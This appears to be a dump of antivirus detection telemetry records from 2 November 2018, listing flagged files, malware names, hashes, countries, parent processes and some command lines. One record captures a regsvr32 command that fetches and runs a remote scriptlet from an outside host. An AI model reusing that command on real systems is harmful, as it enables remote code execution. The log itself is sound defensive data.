  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T12:15:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-073434-00640873', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_221a5b5a\\AVSCAN-20181102-073356-E979216F\\AVSCAN-20181102-073434-00640873', filesize=384000, name='TR/Flooder.384000.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:34:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wysiwygarea.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\wysiwygarea\\wysiwygarea.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:09:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0003139.exe', filepath='\\\\?\\E:\\System Volume Information\\_restore{A62AD956-9D25-452C-B4C0-FA01DCD76CDA}\\RP14\\A0003139.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='1f4185244578f8f7f52d8a86d71173c8e3b7e7d535b406ea8349d8d534d04565', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T04:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='556.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\556\\556.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155848-e576015c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155848-E576015C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:04:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\/u \\\\\\/n \\\\\\/s \\\\\\/i:http:\\\\\\/\\\\\\/q.112adfdae.tk\\\\\\/kma2.sct scrobj.dll', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\regsvr32.exe', parentsize=14848, timestamp='2018-11-02T11:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8269062\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\setup_1011641170.exe', parentsize=2438412, timestamp='2018-11-02T13:10:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='damege_jms.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DAMEGE_Jms\\DAMEGE_Jms.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100232-1d6fb4f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b3c77d8\\AVSCAN-20181102-100046-0F54566B\\AVSCAN-20181102-100232-1D6FB4F0', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201939-dfa979a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_73ba62d0\\AVSCAN-20181102-201543-BC0ED210\\AVSCAN-20181102-201939-DFA979A6', filesize=128000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T14:48:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090425-453e9b5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a6e5b42b\\AVSCAN-20181102-090226-3A2AE099\\AVSCAN-20181102-090425-453E9B5E', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='1ec36fc1bb6bce36dd3a82304be237919ede3e6b790b7a248c340042353b5bc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:05:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124721-0b210b09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98857512\\AVSCAN-20181102-124709-08F831D7\\AVSCAN-20181102-124721-0B210B09', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113331.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113331.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134302-8af7b666', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134302-8AF7B666', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-192812-c40d5460', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-192718-BB426F5A\\AVSCAN-20181101-192812-C40D5460', filesize=6528000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='3672a687f3861ef6834d437102378b9b5720315ef6d559b03fc2aa7bf17d088c', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092848-40b136a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea81adcc\\AVSCAN-20181102-092836-3E544B1D\\AVSCAN-20181102-092848-40B136A5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4C3C5264F1FCC4EDF677F6E9B2E97D6B60C7E315D720F11062392605E1C29FDF', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='4c3c5264f1fcc4edf677f6e9b2e97d6b60c7e315d720f11062392605e1c29fdf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051528-488c0b54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051528-488C0B54', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T08:13:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053117-7dbeb2ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053117-7DBEB2EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052224-4047d239', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052224-4047D239', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160415-1ba8f130', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160415-1BA8F130', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:48:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141608-6644297f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141608-6644297F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:19:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chekraid.exe', filepath='C:\\SYSTEM.SAV\\util\\ChekRaid.exe', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T21:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060144-bf2490ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060144-BF2490ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050328-9b1ce63e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050328-9B1CE63E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054606-8fc4a2cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054606-8FC4A2CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061259-514ccaf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061259-514CCAF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:58Z'), dt=datetime.date(2018, 11, 2)),
